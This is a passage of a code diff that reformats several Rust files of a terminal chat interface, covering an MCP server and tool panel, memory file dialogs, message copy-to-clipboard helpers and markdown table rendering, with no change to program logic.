         .style(Style::default().bg(CLAURST_PANEL_BG).fg(CLAURST_TEXT))
         .render(area, buf);
 
-    let inner = Rect { x: area.x + 1, y: area.y + 1, width: area.width.saturating_sub(2), height: area.height.saturating_sub(2) };
+    let inner = Rect {
+        x: area.x + 1,
+        y: area.y + 1,
+        width: area.width.saturating_sub(2),
+        height: area.height.saturating_sub(2),
+    };
 
     // Group by transport
-    let stdio: Vec<_> = state.servers.iter().enumerate().filter(|(_, s)| s.transport == "stdio").collect();
-    let sse: Vec<_> = state.servers.iter().enumerate().filter(|(_, s)| s.transport == "sse").collect();
-    let http: Vec<_> = state.servers.iter().enumerate().filter(|(_, s)| s.transport == "http").collect();
+    let stdio: Vec<_> = state
+        .servers
+        .iter()
+        .enumerate()
+        .filter(|(_, s)| s.transport == "stdio")
+        .collect();
+    let sse: Vec<_> = state
+        .servers
+        .iter()
+        .enumerate()
+        .filter(|(_, s)| s.transport == "sse")
+        .collect();
+    let http: Vec<_> = state
+        .servers
+        .iter()
+        .enumerate()
+        .filter(|(_, s)| s.transport == "http")
+        .collect();
 
     let mut row = 0u16;
 
-    let render_group = |group: &Vec<(usize, &McpServerView)>, label: &str, row: &mut u16, area: Rect, buf: &mut Buffer, selected: usize, focused: bool| {
-        if group.is_empty() { return; }
-        if *row >= area.height { return; }
-        Paragraph::new(Line::from(vec![Span::styled(label.to_string(), Style::default().fg(Color::DarkGray).add_modifier(Modifier::ITALIC))]))
-            .render(Rect { x: area.x, y: area.y + *row, width: area.width, height: 1 }, buf);
+    let render_group = |group: &Vec<(usize, &McpServerView)>,
+                        label: &str,
+                        row: &mut u16,
+                        area: Rect,
+                        buf: &mut Buffer,
+                        selected: usize,
+                        focused: bool| {
+        if group.is_empty() {
+            return;
+        }
+        if *row >= area.height {
+            return;
+        }
+        Paragraph::new(Line::from(vec![Span::styled(
+            label.to_string(),
+            Style::default()
+                .fg(Color::DarkGray)
+                .add_modifier(Modifier::ITALIC),
+        )]))
+        .render(
+            Rect {
+                x: area.x,
+                y: area.y + *row,
+                width: area.width,
+                height: 1,
+            },
+            buf,
+        );
         *row += 1;
         for (idx, server) in group {
-            if *row >= area.height { break; }
+            if *row >= area.height {
+                break;
+            }
             let sel = *idx == selected && focused;
             let prefix = if sel { "› " } else { "  " };
             let row_text = pad_line(
@@ -344,31 +436,78 @@ fn render_server_list(state: &McpViewState, area: Rect, buf: &mut Buffer) {
             let line = Line::from(vec![Span::styled(
                 row_text,
                 if sel {
-                    Style::default().fg(Color::Black).bg(CLAURST_ACCENT).add_modifier(Modifier::BOLD)
+                    Style::default()
+                        .fg(Color::Black)
+                        .bg(CLAURST_ACCENT)
+                        .add_modifier(Modifier::BOLD)
                 } else {
                     Style::default().fg(CLAURST_TEXT)
                 },
             )]);
-            Paragraph::new(line).render(Rect { x: area.x, y: area.y + *row, width: area.width, height: 1 }, buf);
+            Paragraph::new(line).render(
+                Rect {
+                    x: area.x,
+                    y: area.y + *row,
+                    width: area.width,
+                    height: 1,
+                },
+                buf,
+            );
             if let Some(err) = &server.error_message {
                 *row += 1;
                 if *row < area.height {
                     let short: String = err.chars().take(area.width as usize - 4).collect();
-                    Paragraph::new(Line::from(vec![Span::styled(format!("    {}", short), Style::default().fg(Color::Red))]))
-                        .render(Rect { x: area.x, y: area.y + *row, width: area.width, height: 1 }, buf);
+                    Paragraph::new(Line::from(vec![Span::styled(
+                        format!("    {}", short),
+                        Style::default().fg(Color::Red),
+                    )]))
+                    .render(
+                        Rect {
+                            x: area.x,
+                            y: area.y + *row,
+                            width: area.width,
+                            height: 1,
+                        },
+                        buf,
+                    );
                 }
             }
             *row += 1;
         }
     };
 
-    render_group(&stdio, "stdio", &mut row, inner, buf, state.selected_server, focused);
-    render_group(&sse, "SSE", &mut row, inner, buf, state.selected_server, focused);
-    render_group(&http, "HTTP", &mut row, inner, buf, state.selected_server, focused);
+    render_group(
+        &stdio,
+        "stdio",
+        &mut row,
+        inner,
+        buf,
+        state.selected_server,
+        focused,
+    );
+    render_group(
+        &sse,
+        "SSE",
+        &mut row,
+        inner,
+        buf,
+        state.selected_server,
+        focused,
+    );
+    render_group(
+        &http,
+        "HTTP",
+        &mut row,
+        inner,
+        buf,
+        state.selected_server,
+        focused,
+    );
 }
 
 fn render_tool_list(state: &McpViewState, area: Rect, buf: &mut Buffer) {
-    let focused = state.active_pane == McpViewPane::ToolList || state.active_pane == McpViewPane::ToolDetail;
+    let focused =
+        state.active_pane == McpViewPane::ToolList || state.active_pane == McpViewPane::ToolDetail;
     let border_style = if focused {
         Style::default().fg(CLAURST_ACCENT)
     } else {
@@ -378,7 +517,11 @@ fn render_tool_list(state: &McpViewState, area: Rect, buf: &mut Buffer) {
         .title(Span::styled(
             " Tools ",
             Style::default()
-                .fg(if focused { CLAURST_ACCENT } else { CLAURST_MUTED })
+                .fg(if focused {
+                    CLAURST_ACCENT
+                } else {
+                    CLAURST_MUTED
+                })
                 .add_modifier(Modifier::BOLD),
         ))
         .borders(Borders::ALL)
@@ -386,25 +529,53 @@ fn render_tool_list(state: &McpViewState, area: Rect, buf: &mut Buffer) {
         .style(Style::default().bg(CLAURST_PANEL_BG).fg(CLAURST_TEXT))
         .render(area, buf);
 
-    let inner = Rect { x: area.x + 1, y: area.y + 1, width: area.width.saturating_sub(2), height: area.height.saturating_sub(2) };
+    let inner = Rect {
+        x: area.x + 1,
+        y: area.y + 1,
+        width: area.width.saturating_sub(2),
+        height: area.height.saturating_sub(2),
+    };
 
     // Search bar
     let search_line = Line::from(vec![
         Span::styled("/ ", Style::default().fg(CLAURST_ACCENT)),
         Span::styled(
-            if state.tool_search.is_empty() { "filter tools".to_string() } else { state.tool_search.clone() },
-            Style::default().fg(if state.tool_search.is_empty() { CLAURST_MUTED } else { CLAURST_TEXT }),
+            if state.tool_search.is_empty() {
+                "filter tools".to_string()
+            } else {
+                state.tool_search.clone()
+            },
+            Style::default().fg(if state.tool_search.is_empty() {
+                CLAURST_MUTED
+            } else {
+                CLAURST_TEXT
+            }),
         ),
     ]);
-    Paragraph::new(search_line).render(Rect { x: inner.x, y: inner.y, width: inner.width, height: 1 }, buf);
+    Paragraph::new(search_line).render(
+        Rect {
+            x: inner.x,
+            y: inner.y,
+            width: inner.width,
+            height: 1,
+        },
+        buf,
+    );
 
-    let list_area = Rect { x: inner.x, y: inner.y + 1, width: inner.width, height: inner.height.saturating_sub(1) };
+    let list_area = Rect {
+        x: inner.x,
+        y: inner.y + 1,
+        width: inner.width,
+        height: inner.height.saturating_sub(1),
+    };
     let tools = state.filtered_tools();
     let max_visible = list_area.height as usize;
     let start = state.selected_tool.saturating_sub(max_visible / 2);
 
     for (i, tool) in tools[start..].iter().enumerate() {
-        if i >= max_visible { break; }
+        if i >= max_visible {
+            break;
+        }
         let sel = start + i == state.selected_tool;
         let avail = list_area.width.saturating_sub(20) as usize;
         let name = format!("{}:{}", tool.server, tool.name);
@@ -414,13 +585,21 @@ fn render_tool_list(state: &McpViewState, area: Rect, buf: &mut Buffer) {
         let line = Line::from(vec![Span::styled(
             row,
             if sel {
-                Style::default().fg(Color::Black).bg(CLAURST_ACCENT).add_modifier(Modifier::BOLD)
+                Style::default()
+                    .fg(Color::Black)
+                    .bg(CLAURST_ACCENT)
+                    .add_modifier(Modifier::BOLD)
             } else {
                 Style::default().fg(CLAURST_TEXT)
             },
         )]);
         Paragraph::new(line).render(
-            Rect { x: list_area.x, y: list_area.y + i as u16, width: list_area.width, height: 1 },
+            Rect {
+                x: list_area.x,
+                y: list_area.y + i as u16,
+                width: list_area.width,
+                height: 1,
+            },
             buf,
         );
     }
@@ -452,7 +631,12 @@ fn render_tool_detail(state: &McpViewState, area: Rect, buf: &mut Buffer) {
                 };
                 let lines: Vec<Line> = err_msg
                     .lines()
-                    .map(|l| Line::from(vec![Span::styled(l.to_string(), Style::default().fg(Color::White))]))
+                    .map(|l| {
+                        Line::from(vec![Span::styled(
+                            l.to_string(),
+                            Style::default().fg(Color::White),
+                        )])
+                    })
                     .collect();
                 Paragraph::new(lines)
                     .wrap(ratatui::widgets::Wrap { trim: false })
@@ -466,7 +650,11 @@ fn render_tool_detail(state: &McpViewState, area: Rect, buf: &mut Buffer) {
         .title(Span::styled(
             " Tool Detail ",
             Style::default()
-                .fg(if focused { CLAURST_ACCENT } else { CLAURST_MUTED })
+                .fg(if focused {
+                    CLAURST_ACCENT
+                } else {
+                    CLAURST_MUTED
+                })
                 .add_modifier(Modifier::BOLD),
         ))
         .borders(Borders::ALL)
@@ -474,7 +662,12 @@ fn render_tool_detail(state: &McpViewState, area: Rect, buf: &mut Buffer) {
         .style(Style::default().bg(CLAURST_PANEL_BG).fg(CLAURST_TEXT))
         .render(area, buf);
 
-    let inner = Rect { x: area.x + 1, y: area.y + 1, width: area.width.saturating_sub(2), height: area.height.saturating_sub(2) };
+    let inner = Rect {
+        x: area.x + 1,
+        y: area.y + 1,
+        width: area.width.saturating_sub(2),
+        height: area.height.saturating_sub(2),
+    };
 
     let tools = state.filtered_tools();
     let Some(tool) = tools.get(state.selected_tool) else {
@@ -485,25 +678,35 @@ fn render_tool_detail(state: &McpViewState, area: Rect, buf: &mut Buffer) {
     };
 
     let mut lines = Vec::new();
-    lines.push(Line::from(vec![
-        Span::styled(
-            format!("{}:{}", tool.server, tool.name),
-            Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD),
-        ),
-    ]));
+    lines.push(Line::from(vec![Span::styled(
+        format!("{}:{}", tool.server, tool.name),
+        Style::default()
+            .fg(CLAURST_ACCENT)
+            .add_modifier(Modifier::BOLD),
+    )]));
     lines.push(Line::default());
     for line in tool.description.lines() {
         lines.push(Line::from(vec![Span::raw(line.to_string())]));
     }
     if let Some(schema) = &tool.input_schema {
         lines.push(Line::default());
-        lines.push(Line::from(vec![Span::styled("Input:", Style::default().fg(Color::DarkGray))]));
+        lines.push(Line::from(vec![Span::styled(
+            "Input:",
+            Style::default().fg(Color::DarkGray),
+        )]));
         for line in schema.lines().take(10) {
-            lines.push(Line::from(vec![Span::styled(format!("  {}", line), Style::default().fg(Color::DarkGray))]));
+            lines.push(Line::from(vec![Span::styled(
+                format!("  {}", line),
+                Style::default().fg(Color::DarkGray),
+            )]));
         }
     }
 
-    if let Some(server) = state.servers.iter().find(|server| server.name == tool.server) {
+    if let Some(server) = state
+        .servers
+        .iter()
+        .find(|server| server.name == tool.server)
+    {
         lines.push(Line::default());
         lines.push(Line::from(vec![Span::styled(
             format!(
@@ -579,14 +782,12 @@ mod tests {
             resources: Vec::new(),
             prompts: Vec::new(),
             error_message: error.map(|e| e.to_string()),
-            tools: vec![
-                McpToolView {
-                    name: "tool_a".to_string(),
-                    server: name.to_string(),
-                    description: "Does A".to_string(),
-                    input_schema: None,
-                },
-            ],
+            tools: vec![McpToolView {
+                name: "tool_a".to_string(),
+                server: name.to_string(),
+                description: "Does A".to_string(),
+                input_schema: None,
+            }],
         }
     }
 
@@ -623,13 +824,23 @@ mod tests {
         let mut state = McpViewState::new();
         state.open(vec![
             make_server("fs-server", McpViewStatus::Connected, None),
-            make_server("err-server", McpViewStatus::Error, Some("connection refused")),
+            make_server(
+                "err-server",
+                McpViewStatus::Error,
+                Some("connection refused"),
+            ),
         ]);
-        terminal.draw(|frame| {
-            render_mcp_view(&state, frame.area(), frame.buffer_mut());
-        }).unwrap();
+        terminal
+            .draw(|frame| {
+                render_mcp_view(&state, frame.area(), frame.buffer_mut());
+            })
+            .unwrap();
         let buf = terminal.backend().buffer().clone();
-        let content: String = buf.content().iter().map(|c| c.symbol().chars().next().unwrap_or(' ')).collect();
+        let content: String = buf
+            .content()
+            .iter()
+            .map(|c| c.symbol().chars().next().unwrap_or(' '))
+            .collect();
         assert!(content.contains("MCP") || content.contains("Servers"));
     }
 
@@ -637,13 +848,23 @@ mod tests {
     fn mcp_view_error_expanded_renders_error_detail() {
         let mut terminal = Terminal::new(TestBackend::new(120, 40)).unwrap();
         let mut state = McpViewState::new();
-        state.open(vec![make_server("broken", McpViewStatus::Error, Some("timeout: no response"))]);
+        state.open(vec![make_server(
+            "broken",
+            McpViewStatus::Error,
+            Some("timeout: no response"),
+        )]);
         state.error_expanded = true;
-        terminal.draw(|frame| {
-            render_mcp_view(&state, frame.area(), frame.buffer_mut());
-        }).unwrap();
+        terminal
+            .draw(|frame| {
+                render_mcp_view(&state, frame.area(), frame.buffer_mut());
+            })
+            .unwrap();
         let buf = terminal.backend().buffer().clone();
-        let content: String = buf.content().iter().map(|c| c.symbol().chars().next().unwrap_or(' ')).collect();
+        let content: String = buf
+            .content()
+            .iter()
+            .map(|c| c.symbol().chars().next().unwrap_or(' '))
+            .collect();
         assert!(content.contains("timeout") || content.contains("Error Detail"));
     }
 
@@ -652,10 +873,11 @@ mod tests {
         let mut terminal = Terminal::new(TestBackend::new(80, 24)).unwrap();
         let state = McpViewState::new(); // open = false
         let before = terminal.backend().buffer().clone();
-        terminal.draw(|frame| {
-            render_mcp_view(&state, frame.area(), frame.buffer_mut());
-        }).unwrap();
+        terminal
+            .draw(|frame| {
+                render_mcp_view(&state, frame.area(), frame.buffer_mut());
+            })
+            .unwrap();
         assert_eq!(terminal.backend().buffer().content(), before.content());
     }
 }
-

--- a/src-rust/crates/tui/src/memory_file_selector.rs
+++ b/src-rust/crates/tui/src/memory_file_selector.rs
@@ -67,9 +67,7 @@ impl MemoryFileSelectorState {
         let user_path = claurst_core::config::Settings::config_dir().join("AGENTS.md");
         let user_display = {
             let home = dirs::home_dir().unwrap_or_default();
-            let rel = user_path
-                .strip_prefix(&home)
-                .unwrap_or(&user_path);
+            let rel = user_path.strip_prefix(&home).unwrap_or(&user_path);
             format!("~/{}", rel.display())
         };
         self.files.push(MemoryFile {
@@ -143,11 +141,7 @@ impl Default for MemoryFileSelectorState {
 // ---------------------------------------------------------------------------
 
 /// Render the memory file selector as a centered floating dialog.
-pub fn render_memory_file_selector(
-    state: &MemoryFileSelectorState,
-    area: Rect,
-    buf: &mut Buffer,
-) {
+pub fn render_memory_file_selector(state: &MemoryFileSelectorState, area: Rect, buf: &mut Buffer) {
     if !state.visible {
         return;
     }
@@ -167,10 +161,19 @@ pub fn render_memory_file_selector(
 
     let mut lines: Vec<Line> = Vec::new();
     lines.push(Line::from(vec![
-        Span::styled(" Memory", Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD)),
+        Span::styled(
+            " Memory",
+            Style::default()
+                .fg(CLAURST_ACCENT)
+                .add_modifier(Modifier::BOLD),
+        ),
         Span::styled(" — choose a file", Style::default().fg(CLAURST_MUTED)),
         Span::styled(
-            format!("{:>width$}", "Esc close", width = inner.width.saturating_sub(24) as usize),
+            format!(
+                "{:>width$}",
+                "Esc close",
+                width = inner.width.saturating_sub(24) as usize
+            ),
             Style::default().fg(CLAURST_MUTED),
         ),
     ]));
@@ -190,15 +193,16 @@ pub fn render_memory_file_selector(
         };
 
         if i == state.selected {
-            lines.push(Line::from(vec![
-                Span::styled(
-                    pad_line(&format!("  \u{203a} {type_label} {}", file.display_path), inner.width),
-                    Style::default()
-                        .fg(Color::Black)
-                        .bg(CLAURST_ACCENT)
-                        .add_modifier(Modifier::BOLD),
+            lines.push(Line::from(vec![Span::styled(
+                pad_line(
+                    &format!("  \u{203a} {type_label} {}", file.display_path),
+                    inner.width,
                 ),
-            ]));
+                Style::default()
+                    .fg(Color::Black)
+                    .bg(CLAURST_ACCENT)
+                    .add_modifier(Modifier::BOLD),
+            )]));
         } else {
             lines.push(Line::from(vec![
                 Span::styled(

--- a/src-rust/crates/tui/src/memory_update_notification.rs
+++ b/src-rust/crates/tui/src/memory_update_notification.rs
@@ -64,7 +64,11 @@ pub fn get_relative_memory_path(path: &str) -> String {
     // Return shortest, fall back to normalized absolute path
     match (home_rel.is_empty(), cwd_rel.is_empty()) {
         (false, false) => {
-            if home_rel.len() <= cwd_rel.len() { home_rel } else { cwd_rel }
+            if home_rel.len() <= cwd_rel.len() {
+                home_rel
+            } else {
+                cwd_rel
+            }
         }
         (false, true) => home_rel,
         (true, false) => cwd_rel,
@@ -112,11 +116,19 @@ impl MemoryUpdateNotificationState {
 
     /// Height the notification occupies (0 if not visible).
     pub fn height(&self) -> u16 {
-        if self.visible { 1 } else { 0 }
+        if self.visible {
+            1
+        } else {
+            0
+        }
     }
 
     pub fn tick(&mut self) {
-        if self.visible && self.expires_at.is_some_and(|expires_at| Instant::now() >= expires_at) {
+        if self.visible
+            && self
+                .expires_at
+                .is_some_and(|expires_at| Instant::now() >= expires_at)
+        {
             self.dismiss();
         }
     }
@@ -243,20 +255,40 @@ mod tests {
     fn memory_notif_render_smoke() {
         let mut state = MemoryUpdateNotificationState::new();
         state.show("/home/user/.claurst/AGENTS.md");
-        let area = Rect { x: 0, y: 0, width: 100, height: 4 };
+        let area = Rect {
+            x: 0,
+            y: 0,
+            width: 100,
+            height: 4,
+        };
         let mut buf = ratatui::buffer::Buffer::empty(area);
         render_memory_update_notification(&state, area, &mut buf);
-        let rendered = buf.content.iter().map(|c| c.symbol()).collect::<Vec<_>>().join("");
+        let rendered = buf
+            .content
+            .iter()
+            .map(|c| c.symbol())
+            .collect::<Vec<_>>()
+            .join("");
         assert!(rendered.contains("Memory updated in"));
     }
 
     #[test]
     fn memory_notif_not_rendered_when_invisible() {
         let state = MemoryUpdateNotificationState::new();
-        let area = Rect { x: 0, y: 0, width: 100, height: 4 };
+        let area = Rect {
+            x: 0,
+            y: 0,
+            width: 100,
+            height: 4,
+        };
         let mut buf = ratatui::buffer::Buffer::empty(area);
         render_memory_update_notification(&state, area, &mut buf);
-        let rendered = buf.content.iter().map(|c| c.symbol()).collect::<Vec<_>>().join("");
+        let rendered = buf
+            .content
+            .iter()
+            .map(|c| c.symbol())
+            .collect::<Vec<_>>()
+            .join("");
         assert!(!rendered.contains("Memory updated"));
     }
 }

--- a/src-rust/crates/tui/src/message_copy.rs
+++ b/src-rust/crates/tui/src/message_copy.rs
@@ -51,21 +51,16 @@ pub fn copy_as_markdown(message: &Message) -> String {
                         };
                         let result_text = match content {
                             claurst_core::ToolResultContent::Text(text) => text.clone(),
-                            claurst_core::ToolResultContent::Blocks(blocks) => {
-                                blocks
-                                    .iter()
-                                    .filter_map(|b| match b {
-                                        claurst_core::ContentBlock::Text { text } => Some(text.clone()),
-                                        _ => None,
-                                    })
-                                    .collect::<Vec<_>>()
-                                    .join("\n")
-                            }
+                            claurst_core::ToolResultContent::Blocks(blocks) => blocks
+                                .iter()
+                                .filter_map(|b| match b {
+                                    claurst_core::ContentBlock::Text { text } => Some(text.clone()),
+                                    _ => None,
+                                })
+                                .collect::<Vec<_>>()
+                                .join("\n"),
                         };
-                        Some(format!(
-                            "```\n{}{}\n```",
-                            error_marker, result_text
-                        ))
+                        Some(format!("```\n{}{}\n```", error_marker, result_text))
                     }
                     _ => None,
                 })
@@ -81,47 +76,43 @@ pub fn copy_as_markdown(message: &Message) -> String {
 pub fn copy_as_plaintext(message: &Message) -> String {
     let content = match &message.content {
         claurst_core::MessageContent::Text(text) => strip_markdown(text),
-        claurst_core::MessageContent::Blocks(blocks) => {
-            blocks
-                .iter()
-                .filter_map(|block| match block {
-                    claurst_core::ContentBlock::Text { text } => Some(strip_markdown(text)),
-                    claurst_core::ContentBlock::Thinking { thinking, .. } => {
-                        Some(format!("[Thinking]\n{}", thinking))
-                    }
-                    claurst_core::ContentBlock::ToolUse { name, input, .. } => {
-                        Some(format!(
-                            "[Tool: {}]\n{}",
-                            name,
-                            serde_json::to_string_pretty(input).unwrap_or_default()
-                        ))
-                    }
-                    claurst_core::ContentBlock::ToolResult { content, is_error, .. } => {
-                        let error_marker = if is_error.unwrap_or(false) {
-                            "[ERROR] "
-                        } else {
-                            ""
-                        };
-                        let result_text = match content {
-                            claurst_core::ToolResultContent::Text(text) => text.clone(),
-                            claurst_core::ToolResultContent::Blocks(blocks) => {
-                                blocks
-                                    .iter()
-                                    .filter_map(|b| match b {
-                                        claurst_core::ContentBlock::Text { text } => Some(text.clone()),
-                                        _ => None,
-                                    })
-                                    .collect::<Vec<_>>()
-                                    .join("\n")
-                            }
-                        };
-                        Some(format!("{}{}", error_marker, result_text))
-                    }
-                    _ => None,
-                })
-                .collect::<Vec<_>>()
-                .join("\n\n")
-        }
+        claurst_core::MessageContent::Blocks(blocks) => blocks
+            .iter()
+            .filter_map(|block| match block {
+                claurst_core::ContentBlock::Text { text } => Some(strip_markdown(text)),
+                claurst_core::ContentBlock::Thinking { thinking, .. } => {
+                    Some(format!("[Thinking]\n{}", thinking))
+                }
+                claurst_core::ContentBlock::ToolUse { name, input, .. } => Some(format!(
+                    "[Tool: {}]\n{}",
+                    name,
+                    serde_json::to_string_pretty(input).unwrap_or_default()
+                )),
+                claurst_core::ContentBlock::ToolResult {
+                    content, is_error, ..
+                } => {
+                    let error_marker = if is_error.unwrap_or(false) {
+                        "[ERROR] "
+                    } else {
+                        ""
+                    };
+                    let result_text = match content {
+                        claurst_core::ToolResultContent::Text(text) => text.clone(),
+                        claurst_core::ToolResultContent::Blocks(blocks) => blocks
+                            .iter()
+                            .filter_map(|b| match b {
+                                claurst_core::ContentBlock::Text { text } => Some(text.clone()),
+                                _ => None,
+                            })
+                            .collect::<Vec<_>>()
+                            .join("\n"),
+                    };
+                    Some(format!("{}{}", error_marker, result_text))
+                }
+                _ => None,
+            })
+            .collect::<Vec<_>>()
+            .join("\n\n"),
     };
 
     let role_str = match message.role {
@@ -350,16 +341,14 @@ fn format_block_for_json(block: &claurst_core::ContentBlock) -> String {
             };
             let result_text = match content {
                 claurst_core::ToolResultContent::Text(text) => text.clone(),
-                claurst_core::ToolResultContent::Blocks(blocks) => {
-                    blocks
-                        .iter()
-                        .filter_map(|b| match b {
-                            claurst_core::ContentBlock::Text { text } => Some(text.clone()),
-                            _ => None,
-                        })
-                        .collect::<Vec<_>>()
-                        .join("\n")
-                }
+                claurst_core::ToolResultContent::Blocks(blocks) => blocks
+                    .iter()
+                    .filter_map(|b| match b {
+                        claurst_core::ContentBlock::Text { text } => Some(text.clone()),
+                        _ => None,
+                    })
+                    .collect::<Vec<_>>()
+                    .join("\n"),
             };
             format!("{}{}", error_marker, result_text)
         }
@@ -394,7 +383,11 @@ pub fn copy_to_clipboard(text: &str) -> bool {
         {
             let escaped = text.replace('\'', "''");
             if let Ok(mut child) = std::process::Command::new("powershell")
-                .args(["-NoProfile", "-Command", &format!("Set-Clipboard '{}'", escaped)])
+                .args([
+                    "-NoProfile",
+                    "-Command",
+                    &format!("Set-Clipboard '{}'", escaped),
+                ])
                 .stdout(std::process::Stdio::null())
                 .stderr(std::process::Stdio::null())
                 .spawn()

--- a/src-rust/crates/tui/src/messages/markdown.rs
+++ b/src-rust/crates/tui/src/messages/markdown.rs
@@ -2,18 +2,16 @@
 
 use crate::figures;
 use once_cell::sync::Lazy;
-use regex::Regex;
 use ratatui::{
     style::{Color, Modifier, Style},
     text::{Line, Span},
 };
+use regex::Regex;
 use unicode_width::UnicodeWidthStr;
 
 /// Regex pattern to detect URLs (http://, https://, ftp://, www.)
-static URL_PATTERN: Lazy<Regex> = Lazy::new(|| {
-    Regex::new(r"(?:https?|ftp)://\S+|www\.\S+")
-        .expect("Invalid URL regex pattern")
-});
+static URL_PATTERN: Lazy<Regex> =
+    Lazy::new(|| Regex::new(r"(?:https?|ftp)://\S+|www\.\S+").expect("Invalid URL regex pattern"));
 
 /// Regex pattern to detect email addresses
 static EMAIL_PATTERN: Lazy<Regex> = Lazy::new(|| {

--- a/src-rust/crates/tui/src/messages/markdown_enhanced.rs
+++ b/src-rust/crates/tui/src/messages/markdown_enhanced.rs
@@ -1,19 +1,17 @@
 //! Enhanced markdown rendering with tables, italic, strikethrough support.
 //! This module complements markdown.rs with additional features.
 
+use once_cell::sync::Lazy;
 use ratatui::{
     style::{Color, Modifier, Style},
     text::{Line, Span},
 };
-use unicode_width::UnicodeWidthStr;
-use once_cell::sync::Lazy;
 use regex::Regex;
+use unicode_width::UnicodeWidthStr;
 
 /// Regex pattern to detect markdown table rows (lines starting/ending with |)
-static TABLE_ROW_PATTERN: Lazy<Regex> = Lazy::new(|| {
-    Regex::new(r"^\s*\|.+\|\s*$")
-        .expect("Invalid table row regex pattern")
-});
+static TABLE_ROW_PATTERN: Lazy<Regex> =
+    Lazy::new(|| Regex::new(r"^\s*\|.+\|\s*$").expect("Invalid table row regex pattern"));
 
 /// Regex pattern to detect markdown table separator row (dashes/colons/pipes)
 static TABLE_SEPARATOR_PATTERN: Lazy<Regex> = Lazy::new(|| {
@@ -57,7 +55,7 @@ impl Table {
     fn parse_row(line: &str) -> Vec<String> {
         let trimmed = line.trim();
         let without_pipes = if trimmed.starts_with('|') && trimmed.ends_with('|') {
-            &trimmed[1..trimmed.len()-1]
+            &trimmed[1..trimmed.len() - 1]
         } else {
             trimmed
         };
@@ -116,7 +114,14 @@ pub fn detect_table(lines: &[&str], start_idx: usize) -> Option<(Table, usize)> 
         }
     }
 
-    Some((Table { headers, rows, alignments }, end_idx))
+    Some((
+        Table {
+            headers,
+            rows,
+            alignments,
+        },
+        end_idx,
+    ))
 }
 
 /// Render a markdown table as styled lines with box-drawing characters
@@ -124,7 +129,8 @@ pub fn render_table(table: &Table) -> Vec<Line<'static>> {
     let mut lines = Vec::new();
 
     // Calculate column widths
-    let mut col_widths: Vec<usize> = table.headers
+    let mut col_widths: Vec<usize> = table
+        .headers
         .iter()
         .map(|h| UnicodeWidthStr::width(h.as_str()).max(3))
         .collect();
@@ -152,17 +158,29 @@ pub fn render_table(table: &Table) -> Vec<Line<'static>> {
     )]));
 
     // Header row with bold styling
-    let mut header_spans = vec![Span::styled("  │ ".to_string(), Style::default().fg(Color::DarkGray))];
+    let mut header_spans = vec![Span::styled(
+        "  │ ".to_string(),
+        Style::default().fg(Color::DarkGray),
+    )];
     for (i, header) in table.headers.iter().enumerate() {
         let width = col_widths[i];
-        let padded = match table.alignments.get(i).copied().unwrap_or(TableAlignment::Left) {
+        let padded = match table
+            .alignments
+            .get(i)
+            .copied()
+            .unwrap_or(TableAlignment::Left)
+        {
             TableAlignment::Left => format!("{:<width$}", header, width = width),
             TableAlignment::Right => format!("{:>width$}", header, width = width),
             TableAlignment::Center => {
                 let hdr_width = UnicodeWidthStr::width(header.as_str());
                 let total_pad = width.saturating_sub(hdr_width);
                 let left_pad = total_pad / 2;
-                format!("{:>width$}", &format!("{}{}", " ".repeat(left_pad), header), width = width + left_pad)
+                format!(
+                    "{:>width$}",
+                    &format!("{}{}", " ".repeat(left_pad), header),
+                    width = width + left_pad
+                )
             }
         };
         header_spans.push(Span::styled(
@@ -171,7 +189,10 @@ pub fn render_table(table: &Table) -> Vec<Line<'static>> {
                 .fg(Color::White)
                 .add_modifier(Modifier::BOLD),
         ));
-        header_spans.push(Span::styled(" │ ".to_string(), Style::default().fg(Color::DarkGray)));
+        header_spans.push(Span::styled(
+            " │ ".to_string(),
+            Style::default().fg(Color::DarkGray),
+        ));
     }
     lines.push(Line::from(header_spans));
 
@@ -191,23 +212,38 @@ pub fn render_table(table: &Table) -> Vec<Line<'static>> {
 
     // Data rows
     for row in &table.rows {
-        let mut row_spans = vec![Span::styled("  │ ".to_string(), Style::default().fg(Color::DarkGray))];
+        let mut row_spans = vec![Span::styled(
+            "  │ ".to_string(),
+            Style::default().fg(Color::DarkGray),
+        )];
         for (i, cell) in row.iter().enumerate() {
             if i < col_widths.len() {
                 let width = col_widths[i];
-                let padded = match table.alignments.get(i).copied().unwrap_or(TableAlignment::Left) {
+                let padded = match table
+                    .alignments
+                    .get(i)
+                    .copied()
+                    .unwrap_or(TableAlignment::Left)
+                {
                     TableAlignment::Left => format!("{:<width$}", cell, width = width),
                     TableAlignment::Right => format!("{:>width$}", cell, width = width),
                     TableAlignment::Center => {
                         let cell_width = UnicodeWidthStr::width(cell.as_str());
                         let total_pad = width.saturating_sub(cell_width);
                         let left_pad = total_pad / 2;
-                        format!("{:>width$}", &format!("{}{}", " ".repeat(left_pad), cell), width = width + left_pad)
+                        format!(
+                            "{:>width$}",
+                            &format!("{}{}", " ".repeat(left_pad), cell),
+                            width = width + left_pad
+                        )
                     }
                 };
                 row_spans.push(Span::raw(padded));
             }
-            row_spans.push(Span::styled(" │ ".to_string(), Style::default().fg(Color::DarkGray)));
+            row_spans.push(Span::styled(
+                " │ ".to_string(),
+                Style::default().fg(Color::DarkGray),
+            ));
         }
         lines.push(Line::from(row_spans));
     }
@@ -267,8 +303,9 @@ pub fn parse_inline_formatting(text: &str) -> Vec<Span<'static>> {
 
         // Check for ** or __ (bold) - with limited nesting support
         if idx + 1 < chars.len() {
-            if (chars[idx] == '*' && chars[idx + 1] == '*') ||
-               (chars[idx] == '_' && chars[idx + 1] == '_') {
+            if (chars[idx] == '*' && chars[idx + 1] == '*')
+                || (chars[idx] == '_' && chars[idx + 1] == '_')
+            {
                 let marker = chars[idx];
 
                 // Flush current text
@@ -335,13 +372,12 @@ pub fn parse_inline_formatting(text: &str) -> Vec<Span<'static>> {
         }
 
         // Check for * or _ (italic) - no nesting
-        if idx < chars.len() &&
-           (chars[idx] == '*' || chars[idx] == '_') {
+        if idx < chars.len() && (chars[idx] == '*' || chars[idx] == '_') {
             let marker = chars[idx];
 
             // Make sure it's not part of ** or __
-            let is_bold_marker = (idx + 1 < chars.len() && chars[idx + 1] == marker) ||
-                                 (idx > 0 && chars[idx - 1] == marker);
+            let is_bold_marker = (idx + 1 < chars.len() && chars[idx + 1] == marker)
+                || (idx > 0 && chars[idx - 1] == marker);
 
             if !is_bold_marker {
                 // Flush current text

--- a/src-rust/crates/tui/src/messages/mod.rs
+++ b/src-rust/crates/tui/src/messages/mod.rs
